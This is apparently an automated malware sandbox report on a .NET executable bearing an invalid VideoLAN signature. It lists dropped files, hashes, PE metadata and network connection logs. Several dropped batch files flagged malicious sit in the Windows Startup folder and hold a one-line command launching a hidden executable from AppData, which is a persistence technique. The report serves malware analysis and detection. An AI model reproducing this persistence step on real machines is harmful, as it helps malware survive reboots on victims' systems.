                                                SHA1:BE08F749CFF27555A847B40D0BBAE9B123B44D99
                                                SHA-256:C1EFA09C10A2AEBD0A914729EA4DDF4A312BBA8D403EA0E7FE61E0DD39966E9D
                                                SHA-512:FA676321EF0BAE3A75924A97C3A0F7C764ED46D0CD02ABF132883C45E1DD6909E8A88AED2B672C88BF98090A1B104B96B21A8C6C41205EDD3E803779C0EDF2BD
                                                Malicious:true
                                                Preview:start "" "C:\Users\user\AppData\Local\lHi4knFRqmK4FFdSjJjLFDSD.exe"

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.850567800613269
                                                Encrypted:false
                                                SSDEEP:3:Ljn9m1N+E2J5cGGXHOMFn:fE1N723crHOMF
                                                MD5:7376752613C7B530196EBDA552841E3E
                                                SHA1:84EF1E10BB0910485F6E4A7A8AB84F3D7C3BC8EA
                                                SHA-256:00F9BC5007271E3A50C295E4080E0F505932055D53F0B9895BE2E87618D2E725
                                                SHA-512:A62A9EAC4623FE33E3FACD035E566C88D34701F3399EC462C308BAD796A8EFE98D7F2AE3EE70837E02DEDF1350CDE528E1F3A1132711794BA9767994BBE78D63
                                                Malicious:true
                                                Preview:start "" "C:\Users\user\AppData\Local\ya3fW80pEvNY3Pp8eIbfmN8e.exe"

                                                C:\Users\user\Pictures\3BKVENDizermJCmNwCB42ME3.exe

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                Category:dropped
                                                Size (bytes):7462
                                                Entropy (8bit):5.420482116403958
                                                Encrypted:false
                                                SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                MD5:77F762F953163D7639DFF697104E1470
                                                SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                Malicious:false
                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                                                C:\Users\user\Pictures\vQTyYvkkcYOdC3ep2WUufnYJ.exe

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                Category:dropped
                                                Size (bytes):7462
                                                Entropy (8bit):5.420482116403958
                                                Encrypted:false
                                                SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                MD5:77F762F953163D7639DFF697104E1470
                                                SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                Malicious:false
                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.465924024716172
                                                Encrypted:false
                                                SSDEEP:6144:mzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:oZHtBZWOKnMM6bFpZj4
                                                MD5:632899DC17D6A19101A805A6EA909154
                                                SHA1:961621A2727B0E8670B192B2D22967520D02C79F
                                                SHA-256:12FFB714E44F1EDFFF3B56F70029F5C1AD305297A7274BEA65B7B594E78399ED
                                                SHA-512:B527BA1A888E6E298612FA77264674630743396431417E630D2C447E6C86D3AB8AC10AAE55441B15AA960CB9EFCDAFAFF69367BD0FD3BC0A1E23DADDC63CB1A9
                                                Malicious:false
                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..9............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.968804538165683
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:9'643'376 bytes
                                                MD5:a7f1b43bb75327181bf5535f6eab329d
                                                SHA1:b7d03ad2e90ea8f81ba755c6e5c551e2686c679c
                                                SHA256:79cf97a156358a7dfba188f7b6d516e62279a11fb15b828bbd676b15633c008e
                                                SHA512:5024b110c1bda506e2e07d285643791d2cfcd3fe4ade981b5d92306df0d4f7bf1061d36eb6feef36c8a058bc5990bff96f1011b2a0aa1701276c189b176fb4d6
                                                SSDEEP:196608:yt2OL8IgYaEYShQuM4PaZaCFO5lThlQcqsFDFP/4Qbp/xHKd3fc2obL:ycOL85ShLzPdcqVqsFJHXB9K3fcTbL
                                                TLSH:76A6331A95D80C6ED416D2BEC34026D39E9232415297E3C27E9D8BFE1FB29DB46CC385
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.J....................."........... ........@.. ....................... ............`................................

                                                File Icon

                                                Icon Hash:4e1616963371238e

                                                Static PE Info

                                                General

                                                Entrypoint:0xd1c4fe
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x4A0655ED [Sun May 10 04:19:57 2009 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                Signature Validation Error:The digital signature of the object did not verify
                                                Error Number:-2146869232
                                                Not Before, Not After
                                                • 07/06/2024 02:00:00 09/06/2027 01:59:59
                                                Subject Chain
                                                • CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
                                                Version:3
                                                Thumbprint MD5:E995C628AAD797E68CAE9D6374BC8ACE
                                                Thumbprint SHA-1:CCF8C4F9272D8A25477AF13EC71F97A3027C7319
                                                Thumbprint SHA-256:13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
                                                Serial:09D08EBDA06BE07C815EA7AF25EF6875

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x91c4a40x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x91e0000x11f52.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x92ca000x5b70
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9300000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x91a5040x91a6006e47b3687675ea870f59f777edd90d68unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x91e0000x11f520x120005b2074da2c80f566d7550c481bce9965False0.8323296440972222data7.329922630205283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x9300000xc0x2003926ca23ce0c8eecdfac90c478c10619False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x91e1900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.44133574007220217
                                                RT_ICON0x91ea380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.30057803468208094
                                                RT_ICON0x91efa00xd49ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9958478780084512
                                                RT_ICON0x92c4400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.34221991701244814
                                                RT_ICON0x92e9e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.37570356472795496
                                                RT_ICON0x92fa900x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.524822695035461
                                                RT_GROUP_ICON0x92fef80x5adata0.7777777777777778

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 9, 2024 23:00:52.596740007 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:52.596760988 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:52.596833944 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:52.613301039 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:52.613312006 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.104732990 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.104801893 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.109249115 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.109258890 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.109658003 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.155082941 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.170970917 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.216500998 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.275763988 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.275904894 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.275955915 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.275969028 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.276060104 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.276252031 CEST44349721172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:53.276300907 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.285284042 CEST49721443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:53.412687063 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:53.412719011 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:53.412900925 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:53.413238049 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:53.413252115 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:53.886483908 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:53.886569977 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:53.888478994 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:53.888489008 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:53.888894081 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:53.890635967 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:53.932519913 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390140057 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390290976 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390346050 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:54.390355110 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390441895 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390539885 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:54.390539885 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390567064 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390688896 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:54.390693903 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.390856981 CEST44349722188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:00:54.391202927 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:54.391593933 CEST49722443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:00:58.417087078 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:58.417161942 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:58.417237997 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:58.417587042 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:58.417618990 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:58.915621996 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:58.915745020 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:58.917769909 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:58.917802095 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:58.918279886 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:58.919621944 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:58.960505962 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039024115 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039143085 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039184093 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039226055 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039244890 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.039268970 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039300919 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.039315939 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039360046 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.039366007 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039417028 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039460897 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039508104 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.039515972 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.039558887 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.043725967 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.092597961 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.092619896 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.129797935 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.129880905 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.129904032 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.130055904 CEST44349723172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:00:59.130815983 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.131167889 CEST49723443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:00:59.250060081 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.250092030 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.250159979 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.250579119 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.250595093 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.718180895 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.764466047 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.860126019 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.860140085 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960163116 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960292101 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960349083 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.960361004 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960438013 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960491896 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.960500956 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960665941 CEST44349724172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:00:59.960721016 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:00:59.963488102 CEST49724443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:00.172801018 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.172909021 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.172988892 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.173240900 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.173294067 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.674892902 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.676676989 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.676733971 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896115065 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896164894 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896205902 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896236897 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896270990 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896308899 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896393061 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.896409988 CEST44349725188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:00.896450043 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.896473885 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:00.896986961 CEST49725443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:05.303216934 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.303263903 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.303654909 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.307037115 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.307053089 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.784703970 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.787836075 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.787858009 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912022114 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912058115 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912082911 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912101984 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912108898 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.912127972 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912143946 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.912180901 CEST44349727172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:05.912230015 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.913146019 CEST49727443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:05.975584030 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:05.975617886 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:05.975687027 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:05.975914955 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:05.975929022 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.461864948 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.463610888 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:06.463633060 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695455074 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695538044 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695580006 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695621967 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695624113 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:06.695636034 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695688963 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:06.695698977 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695730925 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695759058 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:06.695770979 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695832968 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:06.695838928 CEST44349728188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:06.695892096 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:06.696294069 CEST49728443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:11.093653917 CEST49729443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:11.093713045 CEST44349729172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:11.093785048 CEST49729443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:11.094022036 CEST49729443192.168.2.6172.67.19.24
